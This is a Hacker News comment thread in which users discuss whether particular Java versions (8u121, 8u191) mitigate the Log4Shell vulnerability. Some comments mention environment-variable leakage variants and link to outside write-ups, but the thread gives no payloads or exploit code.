Hacker News new | past | comments | ask | show | jobs | submit login

as I understand, if we are running Java 8u121 this is not an issue... or is it?

that's what the CVE (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4422...) says:

> protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".




It’s still an issue with current JDKs in certain environments (e.g. Tomcat), see https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj... and https://www.veracode.com/blog/research/exploiting-jndi-injec....

Also, 8u121 was an incomplete fix, the complete fix (still with limitations as noted above) is in 8u191 (see second link above).


As I understand it that prevents the RCE, but not other variants like leaking environment variables.


> other variants like leaking environment variables.

I'll google/search more about these. I assume if we say RCE is a 10 for risk, then maybe others are 5 or 3?


CORRECTION: apparently latest Java is also vulnerable: https://twitter.com/_MG_/status/1470452714203086851




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: